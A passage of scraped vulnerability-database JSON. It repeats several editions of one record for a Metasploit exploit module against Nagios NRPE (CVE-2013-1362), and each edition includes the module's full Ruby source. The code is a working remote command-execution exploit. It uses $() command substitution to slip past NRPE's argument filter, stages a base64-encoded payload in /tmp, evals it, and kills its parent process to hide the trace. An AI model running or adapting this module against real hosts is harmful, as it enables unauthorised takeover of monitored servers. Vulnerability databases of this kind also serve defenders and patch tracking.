"lastseen": "2018-02-25T11:05:10", "differentElements": ["modified", "published"], "edition": 38}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-25T12:55:42", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-25T12:55:42"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-25T12:55:42", "differentElements": ["modified", "published"], "edition": 39}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-27T12:58:46", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-27T12:58:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-27T12:58:46", "differentElements": ["modified", "published"], "edition": 40}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-27T20:54:40", "history": [], "viewCount": 68, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-27T20:54:40"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-27T20:54:40", "differentElements": ["modified", "published"], "edition": 41}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-04T13:00:29", "history": [], "viewCount": 68, "enchantments": {"score": {"value": 6.0, "modified": "2018-03-04T13:00:29"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-04T13:00:29", "differentElements": ["modified", "published"], "edition": 42}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-04T14:57:49", "history": [], "viewCount": 69, "enchantments": {"score": {"value": 6.0, "modified": "2018-03-04T14:57:49"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments 